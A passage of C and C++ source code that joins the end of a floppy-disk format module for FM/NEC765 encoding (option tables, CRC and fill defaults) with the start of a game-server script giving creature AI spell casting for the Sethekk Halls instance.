for (i = 0; i < fmt->fm_nec.rw.sectors; i++) if (fm_nec765_write_sector(&ffo_l1, &fmt->fm_nec, &dsk_sct[i], cwtool_track, format_track, format_side) == -1) return (0);
fifo_set_rd_ofs(ffo_l3, fifo_get_wr_ofs(ffo_l3));
if (fm_write_fill(&ffo_l1, fmt->fm_nec.wr.fill_value6, fmt->fm_nec.wr.fill_length6) == -1) return (0);
if (fm_write_fill(&ffo_l1, fmt->fm_nec.wr.fill_value7, fmt->fm_nec.wr.fill_length7) == -1) return (0);
if (fm_write_fill(&ffo_l1, fmt->fm_nec.wr.epilog_value, fmt->fm_nec.wr.epilog_length) == -1) return (0);
fifo_write_flush(&ffo_l1);
if (bitstream_write(&ffo_l1, ffo_l0, fmt->fm_nec.rw.bnd, fmt->fm_nec.wr.precomp, 2) == -1) return (0);
return (1);
}
/****************************************************************************
*
* functions for configuration
*
****************************************************************************/
#define MAGIC_IGNORE_SECTOR_SIZE 1
#define MAGIC_IGNORE_CHECKSUMS 2
#define MAGIC_IGNORE_TRACK_MISMATCH 3
#define MAGIC_MATCH_SIMPLE 4
#define MAGIC_MATCH_SIMPLE_FIXUP 5
#define MAGIC_POSTCOMP_SIMPLE 6
#define MAGIC_PROLOG_LENGTH 7
#define MAGIC_PROLOG_VALUE 8
#define MAGIC_EPILOG_LENGTH 9
#define MAGIC_EPILOG_VALUE 10
#define MAGIC_FILL_LENGTH1 11
#define MAGIC_FILL_VALUE1 12
#define MAGIC_FILL_LENGTH2 13
#define MAGIC_FILL_VALUE2 14
#define MAGIC_FILL_LENGTH3 15
#define MAGIC_FILL_VALUE3 16
#define MAGIC_FILL_LENGTH4 17
#define MAGIC_FILL_VALUE4 18
#define MAGIC_FILL_LENGTH5 19
#define MAGIC_FILL_VALUE5 20
#define MAGIC_FILL_LENGTH6 21
#define MAGIC_FILL_VALUE6 22
#define MAGIC_FILL_LENGTH7 23
#define MAGIC_FILL_VALUE7 24
#define MAGIC_PRECOMP 25
#define MAGIC_SECTORS 26
#define MAGIC_SYNC_VALUE1 27
#define MAGIC_SYNC_VALUE2 28
#define MAGIC_SYNC_VALUE3 29
#define MAGIC_CRC16_INIT_VALUE1 30
#define MAGIC_CRC16_INIT_VALUE2 31
#define MAGIC_CRC16_INIT_VALUE3 32
#define MAGIC_SECTOR_SIZES 33
#define MAGIC_BOUNDS_OLD 34
#define MAGIC_BOUNDS_NEW 35
/****************************************************************************
* fm_nec765_set_crc16_init_value
****************************************************************************/
static int
fm_nec765_set_crc16_init_value(
struct fm_nec765 *fm_nec,
int mask,
int sync_value,
unsigned short *init_value)
{
unsigned char data;
int i;
if (fm_nec->rw.flags & mask) return (1);
for (data = 0, i = 0x4000; i > 0; i >>= 2) data = (data << 1) | ((sync_value & i) ? 1 : 0);
*init_value = fm_crc16(0xffff, &data, 1);
debug_message(GENERIC, 2, "calculated crc16_init_value1 = 0x%04x", *init_value);
return (1);
}
/****************************************************************************
* fm_nec765_set_defaults
****************************************************************************/
static void
fm_nec765_set_defaults(
union format *fmt)
{
const static struct fm_nec765 fm_nec =
{
.rd =
{
.flags = 0
},
.wr =
{
.prolog_length = 40,
.epilog_length = 274,
.prolog_value = 0x4e,
.epilog_value = 0x4e,
.fill_length1 = 6,
.fill_value1 = 0x00,
.fill_length2 = 26,
.fill_value2 = 0x4e,
.fill_length3 = 6,
.fill_value3 = 0x00,
.fill_length4 = 11,
.fill_value4 = 0x4e,
.fill_length5 = 6,
.fill_value5 = 0x00,
.fill_length6 = 27,
.fill_value6 = 0x4e,
.fill_length7 = 6,
.fill_value7 = 0x00,
.precomp = { }
},
.rw =
{
.sectors = 16,
.sync_value1 = 0xf57e,
.sync_value2 = 0xf56f,
.sync_value3 = 0xf56a,
.crc16_init_value1 = 0,
.crc16_init_value2 = 0,
.crc16_init_value3 = 0,
.flags = 0,
.bnd =
{
BOUNDS_NEW(0x0800, 0x1a52, 0x2a00, 0),
BOUNDS_NEW(0x2b00, 0x36a5, 0x4800, 1)
}
}
};
debug_message(GENERIC, 2, "setting defaults");
fmt->fm_nec = fm_nec;
fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE1_SET,
fmt->fm_nec.rw.sync_value1,
&fmt->fm_nec.rw.crc16_init_value1);
fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE2_SET,
fmt->fm_nec.rw.sync_value2,
&fmt->fm_nec.rw.crc16_init_value2);
fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE3_SET,
fmt->fm_nec.rw.sync_value3,
&fmt->fm_nec.rw.crc16_init_value3);
fm_fill_sector_shift(fmt->fm_nec.rw.pshift, 0, GLOBAL_NR_SECTORS, 0);
}
/****************************************************************************
* fm_nec765_set_read_option
****************************************************************************/
static int
fm_nec765_set_read_option(
union format *fmt,
int magic,
int val,
int ofs)
{
debug_message(GENERIC, 2, "setting read option magic = %d, val = %d, ofs = %d", magic, val, ofs);
if (magic == MAGIC_IGNORE_SECTOR_SIZE) return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_IGNORE_SECTOR_SIZE));
if (magic == MAGIC_IGNORE_CHECKSUMS) return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_IGNORE_CHECKSUMS));
if (magic == MAGIC_IGNORE_TRACK_MISMATCH) return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_IGNORE_TRACK_MISMATCH));
if (magic == MAGIC_MATCH_SIMPLE) return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_MATCH_SIMPLE));
if (magic == MAGIC_MATCH_SIMPLE_FIXUP) return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_MATCH_SIMPLE_FIXUP));
debug_error_condition(magic != MAGIC_POSTCOMP_SIMPLE);
return (setvalue_uchar_bit(&fmt->fm_nec.rd.flags, val, FLAG_RD_POSTCOMP_SIMPLE));
}
/****************************************************************************
* fm_nec765_set_write_option
****************************************************************************/
static int
fm_nec765_set_write_option(
union format *fmt,
int magic,
int val,
int ofs)
{
debug_message(GENERIC, 2, "setting write option magic = %d, val = %d, ofs = %d", magic, val, ofs);
if (magic == MAGIC_PROLOG_LENGTH) return (setvalue_ushort(&fmt->fm_nec.wr.prolog_length, val, 1, 0xffff));
if (magic == MAGIC_PROLOG_VALUE) return (setvalue_uchar(&fmt->fm_nec.wr.prolog_value, val, 0, 0xff));
if (magic == MAGIC_EPILOG_LENGTH) return (setvalue_ushort(&fmt->fm_nec.wr.epilog_length, val, 1, 0xffff));
if (magic == MAGIC_EPILOG_VALUE) return (setvalue_uchar(&fmt->fm_nec.wr.epilog_value, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH1) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length1, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE1) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value1, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH2) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length2, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE2) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value2, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH3) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length3, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE3) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value3, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH4) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length4, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE4) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value4, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH5) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length5, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE5) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value5, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH6) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length6, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE6) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value6, val, 0, 0xff));
if (magic == MAGIC_FILL_LENGTH7) return (setvalue_uchar(&fmt->fm_nec.wr.fill_length7, val, 0, 0xff));
if (magic == MAGIC_FILL_VALUE7) return (setvalue_uchar(&fmt->fm_nec.wr.fill_value7, val, 0, 0xff));
debug_error_condition(magic != MAGIC_PRECOMP);
return (setvalue_short(&fmt->fm_nec.wr.precomp[ofs], val, -0x4000, 0x4000));
}
/****************************************************************************
* fm_nec765_set_rw_option
****************************************************************************/
static int
fm_nec765_set_rw_option(
union format *fmt,
int magic,
int val,
int ofs)
{
debug_message(GENERIC, 2, "setting rw option magic = %d, val = %d, ofs = %d", magic, val, ofs);
if (magic == MAGIC_SECTORS)
{
fm_fill_sector_shift(fmt->fm_nec.rw.pshift, fmt->fm_nec.rw.sectors, GLOBAL_NR_SECTORS, 0);
return (setvalue_uchar(&fmt->fm_nec.rw.sectors, val, 1, GLOBAL_NR_SECTORS));
}
if (magic == MAGIC_SYNC_VALUE1)
{
if (! setvalue_ushort(&fmt->fm_nec.rw.sync_value1, val, 0, 0xffff)) return (0);
return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE1_SET,
fmt->fm_nec.rw.sync_value1,
&fmt->fm_nec.rw.crc16_init_value1));
}
if (magic == MAGIC_SYNC_VALUE2)
{
if (! setvalue_ushort(&fmt->fm_nec.rw.sync_value2, val, 0, 0xffff)) return (0);
return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE2_SET,
fmt->fm_nec.rw.sync_value2,
&fmt->fm_nec.rw.crc16_init_value2));
}
if (magic == MAGIC_SYNC_VALUE3)
{
if (! setvalue_ushort(&fmt->fm_nec.rw.sync_value3, val, 0, 0xffff)) return (0);
return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE2_SET,
fmt->fm_nec.rw.sync_value2,
&fmt->fm_nec.rw.crc16_init_value2));
}
if (magic == MAGIC_CRC16_INIT_VALUE1)
{
setvalue_uchar_bit(&fmt->fm_nec.rw.flags, (val < 0) ? 0 : 1, FLAG_RW_CRC16_INIT_VALUE1_SET);
if (val < 0) return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE1_SET,
fmt->fm_nec.rw.sync_value1,
&fmt->fm_nec.rw.crc16_init_value1));
return (setvalue_ushort(&fmt->fm_nec.rw.crc16_init_value1, val, 0, 0xffff));
}
if (magic == MAGIC_CRC16_INIT_VALUE2)
{
setvalue_uchar_bit(&fmt->fm_nec.rw.flags, (val < 0) ? 0 : 1, FLAG_RW_CRC16_INIT_VALUE2_SET);
if (val < 0) return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE2_SET,
fmt->fm_nec.rw.sync_value2,
&fmt->fm_nec.rw.crc16_init_value2));
return (setvalue_ushort(&fmt->fm_nec.rw.crc16_init_value2, val, 0, 0xffff));
}
if (magic == MAGIC_CRC16_INIT_VALUE3)
{
setvalue_uchar_bit(&fmt->fm_nec.rw.flags, (val < 0) ? 0 : 1, FLAG_RW_CRC16_INIT_VALUE3_SET);
if (val < 0) return (fm_nec765_set_crc16_init_value(&fmt->fm_nec,
FLAG_RW_CRC16_INIT_VALUE3_SET,
fmt->fm_nec.rw.sync_value3,
&fmt->fm_nec.rw.crc16_init_value3));
return (setvalue_ushort(&fmt->fm_nec.rw.crc16_init_value3, val, 0, 0xffff));
}
if (magic == MAGIC_SECTOR_SIZES) return (fm_set_sector_size(fmt->fm_nec.rw.pshift, ofs, GLOBAL_NR_SECTORS, val));
if (magic == MAGIC_BOUNDS_OLD) return (setvalue_bounds_old(fmt->fm_nec.rw.bnd, val, ofs));
debug_error_condition(magic != MAGIC_BOUNDS_NEW);
return (setvalue_bounds_new(fmt->fm_nec.rw.bnd, val, ofs));
}
/****************************************************************************
* fm_nec765_get_sector_size
****************************************************************************/
static int
fm_nec765_get_sector_size(
union format *fmt,
int sector)
{
int i, s;
debug_error_condition(sector >= fmt->fm_nec.rw.sectors);
if (sector >= 0) return (fm_nec765_sector_size(&fmt->fm_nec, sector));
for (i = s = 0; i < fmt->fm_nec.rw.sectors; i++) s += fm_nec765_sector_size(&fmt->fm_nec, i);
return (s);
}
/****************************************************************************
* fm_nec765_get_sectors
****************************************************************************/
static int
fm_nec765_get_sectors(
union format *fmt)
{
return (fmt->fm_nec.rw.sectors);
}
/****************************************************************************
* fm_nec765_get_flags
****************************************************************************/
static int
fm_nec765_get_flags(
union format *fmt)
{
if (options_get_output()) return (FORMAT_FLAG_OUTPUT);
return (FORMAT_FLAG_NONE);
}
/****************************************************************************
* fm_nec765_get_data_offset
****************************************************************************/
static int
fm_nec765_get_data_offset(
union format *fmt)
{
return (-1);
}
/****************************************************************************
* fm_nec765_get_data_size
****************************************************************************/
static int
fm_nec765_get_data_size(
union format *fmt)
{
return (-1);
}
/****************************************************************************
* fm_nec765_read_options
****************************************************************************/
static struct format_option fm_nec765_read_options[] =
{
FORMAT_OPTION_BOOLEAN("ignore_sector_size", MAGIC_IGNORE_SECTOR_SIZE, 1),
FORMAT_OPTION_BOOLEAN("ignore_checksums", MAGIC_IGNORE_CHECKSUMS, 1),
FORMAT_OPTION_BOOLEAN("ignore_track_mismatch", MAGIC_IGNORE_TRACK_MISMATCH, 1),
FORMAT_OPTION_BOOLEAN("match_simple", MAGIC_MATCH_SIMPLE, 1),
FORMAT_OPTION_BOOLEAN("match_simple_fixup", MAGIC_MATCH_SIMPLE_FIXUP, 1),
FORMAT_OPTION_BOOLEAN_COMPAT("postcomp", MAGIC_POSTCOMP_SIMPLE, 1),
FORMAT_OPTION_BOOLEAN("postcomp_simple", MAGIC_POSTCOMP_SIMPLE, 1),
FORMAT_OPTION_END
};
/****************************************************************************
* fm_nec765_write_options
****************************************************************************/
static struct format_option fm_nec765_write_options[] =
{
FORMAT_OPTION_INTEGER("prolog_length", MAGIC_PROLOG_LENGTH, 1),
FORMAT_OPTION_INTEGER("prolog_value", MAGIC_PROLOG_VALUE, 1),
FORMAT_OPTION_INTEGER("epilog_length", MAGIC_EPILOG_LENGTH, 1),
FORMAT_OPTION_INTEGER("epilog_value", MAGIC_EPILOG_VALUE, 1),
FORMAT_OPTION_INTEGER("fill_length1", MAGIC_FILL_LENGTH1, 1),
FORMAT_OPTION_INTEGER("fill_value1", MAGIC_FILL_VALUE1, 1),
FORMAT_OPTION_INTEGER("fill_length2", MAGIC_FILL_LENGTH2, 1),
FORMAT_OPTION_INTEGER("fill_value2", MAGIC_FILL_VALUE2, 1),
FORMAT_OPTION_INTEGER("fill_length3", MAGIC_FILL_LENGTH3, 1),
FORMAT_OPTION_INTEGER("fill_value3", MAGIC_FILL_VALUE3, 1),
FORMAT_OPTION_INTEGER("fill_length4", MAGIC_FILL_LENGTH4, 1),
FORMAT_OPTION_INTEGER("fill_value4", MAGIC_FILL_VALUE4, 1),
FORMAT_OPTION_INTEGER("fill_length5", MAGIC_FILL_LENGTH5, 1),
FORMAT_OPTION_INTEGER("fill_value5", MAGIC_FILL_VALUE5, 1),
FORMAT_OPTION_INTEGER("fill_length6", MAGIC_FILL_LENGTH6, 1),
FORMAT_OPTION_INTEGER("fill_value6", MAGIC_FILL_VALUE6, 1),
FORMAT_OPTION_INTEGER("fill_length7", MAGIC_FILL_LENGTH7, 1),
FORMAT_OPTION_INTEGER("fill_value7", MAGIC_FILL_VALUE7, 1),
FORMAT_OPTION_INTEGER("precomp", MAGIC_PRECOMP, 4),
FORMAT_OPTION_END
};
/****************************************************************************
* fm_nec765_rw_options
****************************************************************************/
static struct format_option fm_nec765_rw_options[] =
{
FORMAT_OPTION_INTEGER("sectors", MAGIC_SECTORS, 1),
FORMAT_OPTION_INTEGER("sync_value1", MAGIC_SYNC_VALUE1, 1),
FORMAT_OPTION_INTEGER("sync_value2", MAGIC_SYNC_VALUE2, 1),
FORMAT_OPTION_INTEGER("sync_value3", MAGIC_SYNC_VALUE3, 1),
FORMAT_OPTION_INTEGER("crc16_init_value1", MAGIC_CRC16_INIT_VALUE1, 1),
FORMAT_OPTION_INTEGER("crc16_init_value2", MAGIC_CRC16_INIT_VALUE2, 1),
FORMAT_OPTION_INTEGER("crc16_init_value3", MAGIC_CRC16_INIT_VALUE3, 1),
FORMAT_OPTION_INTEGER("sector_sizes", MAGIC_SECTOR_SIZES, -1),
FORMAT_OPTION_INTEGER_COMPAT("bounds", MAGIC_BOUNDS_OLD, 6),
FORMAT_OPTION_INTEGER("bounds_old", MAGIC_BOUNDS_OLD, 6),
FORMAT_OPTION_INTEGER("bounds_new", MAGIC_BOUNDS_NEW, 6),
FORMAT_OPTION_END
};
/****************************************************************************
*
* global functions
*
****************************************************************************/
/****************************************************************************
* fm_nec765_format_desc
****************************************************************************/
struct format_desc fm_nec765_format_desc =
{
.name = "fm_nec765",
.level = 3,
.set_defaults = fm_nec765_set_defaults,
.set_read_option = fm_nec765_set_read_option,
.set_write_option = fm_nec765_set_write_option,
.set_rw_option = fm_nec765_set_rw_option,
.get_sectors = fm_nec765_get_sectors,
.get_sector_size = fm_nec765_get_sector_size,
.get_flags = fm_nec765_get_flags,
.get_data_offset = fm_nec765_get_data_offset,
.get_data_size = fm_nec765_get_data_size,
.track_statistics = fm_nec765_statistics,
.track_read = fm_nec765_read_track,
.track_write = fm_nec765_write_track,
.fmt_opt_rd = fm_nec765_read_options,
.fmt_opt_wr = fm_nec765_write_options,
.fmt_opt_rw = fm_nec765_rw_options
};
/******************************************************** Karsten Scheibler */
| gpl-2.0 |
jameyboor/Antrix | src/scripts/InstanceScripts/Instance_SethekkHalls.cpp | 2 | 53244 | #include "StdAfx.h"
#include "Setup.h"
/************************************************************************/
/* Instance_SethekkHalls.cpp Script */
/************************************************************************/
// Avian Darkhawk AI
#define CN_AVIAN_DARKHAWK 20686
#define CHARGE 36509 // no idea if this is correct id
class AVIANDARKHAWKAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(AVIANDARKHAWKAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
AVIANDARKHAWKAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(CHARGE);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = true;
spells[0].perctrigger = 5.0f;
spells[0].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
Unit *target;
int nrspells;
};
// Avian Ripper AI
#define CN_AVIAN_RIPPER 21891
#define FLESH_RIP 40199
class AVIANRIPPERAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(AVIANRIPPERAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
AVIANRIPPERAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(FLESH_RIP);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = true;
spells[0].perctrigger = 15.0f;
spells[0].attackstoptimer = 3000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Avian Warhawk AI
#define CN_AVIAN_WARHAWK 21904 // test it more@
#define CLEAVE 38474 // no idea if this is right
#define CHARGE_WARHAWK 40602 // same here
#define CARNIVOROUS_BITE 39382 // and here =)
class AVIANWARHAWKAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(AVIANWARHAWKAI);
SP_AI_Spell spells[3];
bool m_spellcheck[3];
AVIANWARHAWKAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 3;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(CLEAVE);
spells[0].targettype = TARGET_VARIOUS;
spells[0].instant = true;
spells[0].perctrigger = 12.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(CHARGE_WARHAWK);
spells[1].targettype = TARGET_ATTACKING;
spells[1].instant = true;
spells[1].perctrigger = 5.0f;
spells[1].attackstoptimer = 1000;
spells[2].info = sSpellStore.LookupEntry(CARNIVOROUS_BITE);
spells[2].targettype = TARGET_ATTACKING; // check targeting!
spells[2].instant = true;
spells[2].perctrigger = 12.0f;
spells[2].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
Unit *target;
int nrspells;
};
// Cobalt Serpent AI
#define CN_COBALT_SERPENT 19428
#define WING_BUFFET 41572
#define FROSTBOLT 40429 // no idea about if these are good ids :P
#define CHAIN_LIGHTNING_SERPENT 39945
class COBALTSERPENTAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(COBALTSERPENTAI);
SP_AI_Spell spells[3];
bool m_spellcheck[3];
COBALTSERPENTAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 3;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(WING_BUFFET);
spells[0].targettype = TARGET_VARIOUS;
spells[0].instant = false;
spells[0].perctrigger = 7.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(FROSTBOLT);
spells[1].targettype = TARGET_ATTACKING;
spells[1].instant = false;
spells[1].perctrigger = 15.0f;
spells[1].attackstoptimer = 1000;
spells[2].info = sSpellStore.LookupEntry(CHAIN_LIGHTNING_SERPENT);
spells[2].targettype = TARGET_ATTACKING;
spells[2].instant = false;
spells[2].perctrigger = 9.0f;
spells[2].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// Time-Lost Controller AI
#define CN_TIME_LOST_CONTROLLER 20691
#define SHIRNK 36697 // 36697 or 35013
//#define CONTROL_TOTEM // Can't find spell for that :O
class TIMELOSTCONTROLLERAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(TIMELOSTCONTROLLERAI);
SP_AI_Spell spells[1];
bool m_spellcheck[1];
TIMELOSTCONTROLLERAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
nrspells = 1;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(SHIRNK);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = true;
spells[0].perctrigger = 10.0f;
spells[0].attackstoptimer = 1000;
/*
spells[1].info = sSpellStore.LookupEntry(CONTROL_TOTEM);
spells[1].targettype = TARGET_;
spells[1].instant = false;
spells[1].perctrigger = 0.0f;
spells[1].attackstoptimer = 1000;
*/
}
void OnCombatStart(Unit* mTarget)
{
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
